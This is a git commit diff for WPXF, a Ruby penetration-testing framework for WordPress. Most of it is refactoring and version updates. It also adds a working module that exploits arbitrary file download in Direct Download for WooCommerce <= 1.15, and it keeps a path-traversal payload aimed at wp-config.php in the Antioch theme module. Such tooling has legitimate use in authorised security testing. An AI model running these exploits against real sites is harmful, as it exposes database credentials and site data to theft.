Merged development into master

Author: rastating

.ruby-version

@@ -1 +1 @@
-2.2.2
+2.2.6

.travis.yml

@@ -1,11 +1,8 @@
 language: ruby
 rvm:
-  - 2.2.0
-  - 2.2.1
-  - 2.2.2
-  - 2.2.3
-  - 2.2.4
-  - 2.3.0
+  - 2.2.6
+  - 2.3.3
+  - 2.4.0
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
 script: bundle exec rspec

Gemfile

@@ -1,9 +1,9 @@
 source 'https://rubygems.org'
 gem 'colorize', '>=0.8.1'
 gem 'mime-types', '>=3.1'
-gem 'nokogiri', '~>1.6.8'
-gem 'slop', '~>4.3'
-gem 'typhoeus', '~>1.1.0'
+gem 'nokogiri', '~>1.7.0'
+gem 'slop', '~>4.4.1'
+gem 'typhoeus', '~>1.1.2'
 gem 'require_all', '~>1.3.3'
 gem 'rubyzip', '~>1.2'
 

README.md

@@ -4,7 +4,7 @@
 A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
 
 ### What do I need to run it?
-Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
+Ensure that you have Ruby >= 2.2.6 installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running ```bundle install```.
 
 If bundler is not present on your system, you can install it by running ```gem install bundler```.
 

VERSION

@@ -1 +1 @@
-1.3.2
+1.4

lib/wpxf/core/module_info.rb

@@ -12,11 +12,12 @@ def initialize
     def update_info(info)
       required_keys = [:name, :desc, :author, :date]
       unless required_keys.all? { |key| info.key?(key) || @info.key?(key) }
-        fail 'Missing one or more required module info keys'
+        raise 'Missing one or more required module info keys'
       end
 
       @info.merge!(info)
       @info[:date] = Date.parse(@info[:date].to_s)
+      @info[:desc] = @info[:desc].split.join(' ')
       @info
     end
 

lib/wpxf/wordpress/file_download.rb

@@ -18,11 +18,15 @@ def initialize
       StringOption.new(
         name: 'export_path',
         desc: 'The path to save the file to',
-        required: false
+        required: export_path_required
       )
     ])
   end
 
+  def export_path_required
+    false
+  end
+
   # @return [String] the working directory of the vulnerable file.
   def working_directory
     nil
@@ -60,7 +64,15 @@ def remote_file
 
   # @return [String] the path to save the file to.
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  # Validate the contents of the requested file.
+  # @param [String] the file contents.
+  # @return [Boolean] true if valid.
+  def validate_content(content)
+    true
   end
 
   # Run the module.
@@ -71,12 +83,12 @@ def run
     return false unless super
 
     res = request_file
-    return false unless validate_result(res)
+    return false unless validate_result(res) && validate_content(res.body)
 
     if export_path.nil?
       emit_success "Result: \n#{res.body}"
     else
-      emit_success "Downlaoded file to #{export_path}"
+      emit_success "Downloaded file to #{export_path}"
     end
 
     true

modules/auxiliary/all_in_one_migration_export.rb

@@ -6,9 +6,11 @@ def initialize
 
     update_info(
       name: 'All-in-One Migration Export',
-      desc: 'This module allows you to export WordPress data (such as the '\
-            'database, plugins, themes, uploaded files, etc) via the '\
-            'All-in-One Migration plugin in versions < 2.0.5.',
+      desc: %(
+        This module allows you to export WordPress data (such as the
+        database, plugins, themes, uploaded files, etc) via the
+        All-in-One Migration plugin in versions < 2.0.5.
+      ),
       author: [
         'James Golovich',                  # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -40,7 +42,8 @@ def check
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def run
@@ -66,6 +69,6 @@ def run
     end
 
     emit_success "Saved export to #{export_path}"
-    return true
+    true
   end
 end

modules/auxiliary/antioch_arbitrary_file_download.rb

@@ -1,14 +1,11 @@
 class Wpxf::Auxiliary::AntiochArbitraryFileDownload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::FileDownload
 
   def initialize
     super
 
     update_info(
       name: 'Antioch Theme Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in the Antioch theme '\
-            'which allows you to download any arbitrary file accessible '\
-            'by the user the web server is running as.',
       author: [
         'Ashiyane Digital Security Team',  # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -18,77 +15,25 @@ def initialize
       ],
       date: 'Sep 08 2014'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'remote_file',
-        desc: 'The path to the remote file (relative to /wp-content/themes/antioch/lib/scripts/)',
-        required: true,
-        default: '../../../../../wp-config.php'
-      ),
-      StringOption.new(
-        name: 'export_path',
-        desc: 'The file to save the file to',
-        required: false
-      )
-    ])
   end
 
   def check
     check_theme_version_from_style('antioch')
   end
 
-  def remote_file
-    normalized_option_value('remote_file')
+  def default_remote_file_path
+    '../../../../../wp-config.php'
   end
 
-  def export_path
-    normalized_option_value('export_path')
+  def working_directory
+    'wp-content/themes/antioch/lib/scripts/'
   end
 
   def downloader_url
     normalize_uri(wordpress_url_themes, 'antioch', 'lib', 'scripts', 'download.php')
   end
 
-  def request_file
-    if export_path.nil?
-      emit_info 'Requesting file...'
-      return execute_get_request(
-        url: downloader_url,
-        params: { 'file' => remote_file }
-      )
-    else
-      emit_info 'Downloading file...'
-      return download_file(
-        url: downloader_url,
-        method: :get,
-        params: { 'file' => remote_file },
-        local_filename: export_path
-      )
-    end
-  end
-
-  def run
-    return false unless super
-
-    res = request_file
-
-    if res.nil? || res.timed_out?
-      emit_error 'Request timed out, try increasing the http_client_timeout'
-      return false
-    end
-
-    if res.code != 200
-      emit_error "Server responded with code #{res.code}"
-      return false
-    end
-
-    if export_path.nil?
-      emit_success "Result: \n#{res.body}"
-    else
-      emit_success "Downlaoded file to #{export_path}"
-    end
-
-    true
+  def download_request_params
+    { 'file' => remote_file }
   end
 end

modules/auxiliary/cp_image_store_arbitrary_file_download.rb

@@ -6,9 +6,11 @@ def initialize
 
     update_info(
       name: 'CP Image Store Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in version 1.0.5 of the CP '\
-            'Image Store plugin which allows you to download any arbitrary '\
-            'file accessible by the user the web server is running as.',
+      desc: %(
+        This module exploits a vulnerability in version 1.0.5 of the CP
+        Image Store plugin which allows you to download any arbitrary
+        file accessible by the user the web server is running as.
+      ),
       author: [
         'Joaquin Ramirez Martinez',        # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -53,7 +55,8 @@ def remote_file
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def run
@@ -107,6 +110,6 @@ def run
       end
     end
 
-    return true
+    true
   end
 end

modules/auxiliary/direct_download_for_woocommerce_file_download.rb

@@ -0,0 +1,58 @@
+class Wpxf::Auxiliary::DirectDownloadForWoocommerceFileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Direct Download for WooCommerce <= 1.15 File Download',
+      author: [
+        'Diego Celdran Morell',           # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8724']
+      ],
+      date: 'Jan 17 2017'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'product_id',
+        desc: 'A valid product ID that has direct download enabled',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    url = normalize_uri(full_uri, 'direct-download', Utility::Text.rand_alpha(5))
+    res = execute_get_request(url: url)
+    return :vulnerable if res && !validate_content(res.body)
+    :unknown
+  end
+
+  def product_id
+    normalized_option_value('product_id')
+  end
+
+  def default_remote_file_path
+    'wp-config.php'
+  end
+
+  def working_directory
+    'the WordPress installation directory'
+  end
+
+  def download_ref
+    Base64.strict_encode64("#{product_id}|#{remote_file}")
+  end
+
+  def downloader_url
+    normalize_uri(full_uri, 'direct-download', download_ref)
+  end
+
+  def validate_content(content)
+    content !~ /This product is not available for direct free download/
+  end
+end

modules/auxiliary/duplicator_csrf_db_export.rb

@@ -7,9 +7,11 @@ def initialize
 
     update_info(
       name: 'Duplicator <= 1.1.3 CSRF Database Export',
-      desc: 'This module exploits a cross-site request forgery vulnerability found '\
-            'in Duplicator <= 1.1.3 which will create a database export when a user '\
-            'visits the generated web page.',
+      desc: %(
+        This module exploits a cross-site request forgery vulnerability found
+        in Duplicator <= 1.1.3 which will create a database export when a user
+        visits the generated web page.
+      ),
       author: [
         'RatioSec Research',              # Discovery and disclosure
         'Rob Carr <rob[at]rastating.com>' # WPXF module
@@ -48,7 +50,8 @@ def check
   end
 
   def export_path
-    datastore['export_path']
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def complete_path

modules/auxiliary/ghost_unrestricted_export_download.rb

@@ -39,7 +39,8 @@ def check
   end
 
   def export_path
-    normalized_option_value('export_path')
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
   end
 
   def download_url